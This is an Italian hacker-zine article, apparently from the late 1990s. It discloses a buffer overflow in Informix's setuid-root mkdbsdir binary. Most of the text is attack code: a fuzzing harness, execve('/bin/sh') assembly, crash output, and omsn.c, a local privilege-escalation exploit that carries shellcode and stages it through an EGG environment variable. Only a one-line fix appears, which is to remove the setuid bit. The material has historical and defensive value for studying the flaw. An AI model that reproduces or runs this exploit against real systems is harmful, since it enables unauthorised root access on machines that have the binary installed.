============================================================================== =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- --------------------[ previous ]---[ index ]---[ next ]--------------------- ------------------------[ iNF0RMiX DYNAMiC SERVER BUG ]----------------------- ----------------------------------[ pIGpEN ]---------------------------------- C0NSUM0: 2 Red Bull 1 lattina di cocacola DEDICA: alla mia prima paga andata in stronzate... al mio lettore cd che ha perso il coperchio e per funzionare ha bisogno di un po' di nastro adesivo sul pulsantino che rileva se il fottuto tettuccio e' chiuso... MUSICA ASC0TATA: One More Saturday Night per 11 volte di seguito Grateful Dead e Around Around che con le Red Bull mi faceva sentire in versione tecnosciamaica. [pigpen@sp00f sbin]$ ls -al /opt/informix/bin/mkdbsdir -rwsr-sr-x 1 root informix 892934 dic 11 1998 /opt/informix/bin/mkdbsdir /* ---------------------------- rpt.c ------------------------------------- */ /**************************************************************************** This program simply fills out the given number of bytes. By default, the byte is 0x41 ('A') which corresponds, on an intel CPU to "inc ecx". It could have been better to use NOP (0x90), but this character isn't quite printable so it is not easy to select it on the screen :-) Anyway, "INC ECX" doesn't matter and doesn't change the code's behaviour, so if a program branches in the middle of that, it can run till the end. 
Willy ****************************************************************************/
#include <stdio.h>

/*
 * rpt: writes argv[1] bytes of 0x41 ('A') to stdout, as described in the
 * header comment above.
 *
 * Visible defects, left as they are: argc is never checked, so running the
 * program with no argument hands argv[1] (a null pointer) to atoi(); atoi()
 * reports no errors, a non-numeric argument simply yields 0 and prints
 * nothing; exit() is called without <stdlib.h>; main() relies on pre-C99
 * implicit int.
 */
main(int argc, char **argv)
{
    int i;
    for (i=atoi(argv[1]);i;i--)
        putchar(0x41); /* inc ecx */
    exit(0);
}
/* ------------------------------------------------------------------------ */

/* ------------------------------ esp.c --------------------------------- */
/**************************************************************************/
/* Calculate the stack pointer value for this program. Since it doesn't   */
/* vary very much from one program to another inside the same shell, the  */
/* returned value can be used with a good accuracy. The output is in a    */
/* binary format so that it can be concatenated to another string         */
/* containing a portion of code. Warning !! The value returned mustn't    */
/* have any of its 4 bytes set to 0, or it will be an 'end of string'.    */
/* You can play with argv to subtract a value to the stack before giving  */
/* it to stdout.                                                          */
/*                                                                        */
/* Willy                                                                  */
/**************************************************************************/
#include <stdio.h>

/*
 * Returns the current stack pointer: the asm moves %esp into %eax and the
 * (implicit int) function then relies on the caller reading %eax as its
 * return value. That is a 32-bit x86 calling-convention assumption; the C
 * code itself has no return statement and gives the compiler no reason to
 * keep %eax intact.
 */
static inline getesp() { __asm__(" movl %esp,%eax "); }

/*
 * Prints getesp() minus an optional decrement (argv[1], parsed with atoi(),
 * so junk silently becomes 0) as raw 4-byte binary output. Note that the
 * value is written twice, so 8 bytes are emitted in total, and neither
 * fwrite() return value is checked.
 */
main (int argc, char **argv)
{
    long unsigned esp;
    int decal=0;
    if (argc>1) decal=atoi(argv[1]);
    esp=getesp()-decal;
    fwrite(&esp,4,1,stdout); /* emitted twice: 8 bytes on stdout */
    fwrite(&esp,4,1,stdout);
}
/* ------------------------------------------------------------------------ */

/* -------------------------- tryall.mkdbsdir ----------------------------- */
# let's try something with mkdbsdir using Willy Tarreau's tool
# tarreau@aemiaif.ibp.fr
# NOTE(review): as printed here the #! line is preceded by comments, so it is
# not an interpreter directive; the script runs under whatever shell invokes it.
#!/bin/tcsh
# the shell name is given by 'echo -n ...' and must be exactly 7 chars here,
# or you'll have to modify the stack base for the 'LEA' instruction in the
# source 'exec.a86'.
# You can copy /usr/bin/id to /tmp and run /tmp/id instead. That's good too.
echo "PLEASE DO NOT USE THIS TO CRACK A SYSTEM, BUT JUST TO TEST YOURS\!\!\!"
# Loop over argument lengths 100..2999. Each iteration runs mkdbsdir once with
# an argument assembled from: $val bytes from ./rpt, the assembled exec.bin,
# the literal '/bin/sh', and the 8 raw bytes printed by ./esp 200 (see esp.c).
# Nothing checks the exit status; the crashes are only visible as the shell's
# "Segmentation fault" messages in the transcript below.
set val = 100
while ($val < 3000)
    echo Trying $val
    /opt/informix/bin/mkdbsdir `./rpt $val;cat exec.bin;echo -n '/bin/sh';./esp 200`
    @ val++
end
/* ------------------------------------------------------------------------ */

/* ----------------------------- exec.a86 --------------------------------- */
mov ecx,esp
xor eax,eax
push eax
lea ebx,[esp-7]
add esp,12
push eax
push ebx
mov edx,ecx
mov al,11
int 0x80
/* ------------------------------------------------------------------------ */

$ cc rpt.c -o rpt
$ cc esp.c -o esp
$ as86 -b exec.bin exec.a86
$ chmod +x tryall.mkdbsdir
$ ./tryall.mkdbsdir
.
.
.
Trying 122
Trying 123
Trying 124
Trying 125
Trying 126
Trying 127
Trying 128
Trying 129
Trying 130
Trying 131
Trying 132
Trying 133
Trying 134
Segmentation fault
Trying 135
Segmentation fault
Trying 136
Segmentation fault
Trying 137
Trying 138
Segmentation fault
Trying 139
Segmentation fault
Trying 140
Segmentation fault
Trying 141
Trying 142
.
.
Segmentation fault
.
.
Possibile buffer overflow... :\

/* omsn.c
   One More Saturday Night (the song I was listening to while I found
   this piece of crap in informix)
   pIGpEN/s0ftpj
   " Angels of the lysergic era burning for the ancient heavenly
     connection to the starry dynamo in the machinery of night "
   to father jorma
*/
#include <stdlib.h>

/* Target binary; the ls -al listing at the top of the article shows it
   installed setuid root and setgid informix (-rwsr-sr-x), which is what
   turns a crash in argument handling into a privilege boundary problem. */
#define PROG_NAME_WITH_FULL_PATH "/opt/informix/bin/mkdbsdir" // Who made who ....
/* All three tunables default to 0 and are only overridden by argv[1..3] in
   main(); the author deliberately leaves the working values blank. */
#define DEFAULT_OFFSET 0 // what here?!? :))
#define DEFAULT_BUFFER_SIZE 0 // and here?!? :))
#define DEFAULT_EGG_SIZE 0 // and here?!?!
:)) // NOPEZ rulez
#define NOP 0x90 /* single-byte x86 no-op used to pad the egg */

/* Payload bytes followed by the literal "/bin/sh"; copied byte-for-byte into
   the egg by main() below. */
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

/*
 * Returns the stack pointer by moving %esp into %eax and relying on %eax
 * being read as the return value (32-bit x86 only; the function has no
 * return statement, so the C code gives the compiler no such guarantee).
 */
unsigned long get_esp(void) { __asm__("movl %esp,%eax"); }

/*
 * Proof-of-concept harness for the mkdbsdir crash shown in the transcript
 * above.
 *
 * argv[1] = buffer size, argv[2] = offset subtracted from get_esp(),
 * argv[3] = egg size; all default to 0 via the DEFAULT_* macros. buff is
 * filled with the chosen address and handed to mkdbsdir as its argument
 * through system(); egg is NOP padding followed by shellcode and is exported
 * as the EGG environment variable via putenv().
 *
 * Defects a reviewer would flag in this file as it stands:
 *  - printf/strlen/memcpy/snprintf/system/putenv are used without <stdio.h>
 *    or <string.h>: implicit declarations.
 *  - the address fill stores a long every 4 bytes, which only stays inside
 *    buff where sizeof(long) == 4.
 *  - "eggsize - strlen(shellcode) - 1" is evaluated as size_t, so a small
 *    eggsize wraps the loop bound; "buff[bsize - 1]" and "egg[eggsize - 1]"
 *    index before the allocation when the size is 0.
 *  - "%x" is given a long; exit(0) reports success on the failure paths;
 *    fwrite-style return values and malloc(0) behaviour are not considered.
 *  - buff is interpolated unquoted into a shell command line.
 * The article's own remedy (SOLUZIONE below) is to drop the setuid bit from
 * mkdbsdir until a fix is available.
 */
void main(int argc, char *argv[])
{
    char *buff, *ptr, *egg;
    long *addr_ptr, addr;
    int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
    int i, eggsize=DEFAULT_EGG_SIZE;
    char cmd[512];

    /* atoi(): no error reporting, non-numeric input silently becomes 0 */
    if (argc > 1) bsize = atoi(argv[1]);
    if (argc > 2) offset = atoi(argv[2]);
    if (argc > 3) eggsize = atoi(argv[3]);

    printf("mkdbsdir ... \n");

    if (!(buff = malloc(bsize))) {
        printf("Can't allocate memory.\n");
        exit(0); /* note: exit status 0 on failure */
    }
    if (!(egg = malloc(eggsize))) {
        printf("Can't allocate memory.\n");
        exit(0);
    }

    addr = get_esp() - offset;
    printf("Using address: 0x%x\n", addr); /* %x with a long argument */

    /* fill buff with copies of addr; assumes sizeof(long) == 4 */
    ptr = buff;
    addr_ptr = (long *) ptr;
    for (i = 0; i < bsize; i+=4) *(addr_ptr++) = addr;

    /* egg = NOP padding, then shellcode; the bound is size_t arithmetic */
    ptr = egg;
    for (i = 0; i < eggsize - strlen(shellcode) - 1; i++) *(ptr++) = NOP;
    for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i];

    buff[bsize - 1] = '\0';
    egg[eggsize - 1] = '\0';

    /* "EGG=" overwrites the first four NOPs; egg stays allocated for putenv */
    memcpy(egg,"EGG=",4);
    putenv(egg);

    /* cmd is 512 bytes; buff is passed through /bin/sh unquoted */
    snprintf(cmd,511,"%s %s",PROG_NAME_WITH_FULL_PATH,buff);
    system(cmd);
}

SOLUZIONE Consigliabile togliere il +s fino a quando qualkosa non sara' pubblico... Ehi gente perche' mi brucia la pancia?... Vuol dire che c'e' qualkosa dentro? bauz pIGpEN
--------------------[ previous ]---[ index ]---[ next ]---------------------
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
==============================================================================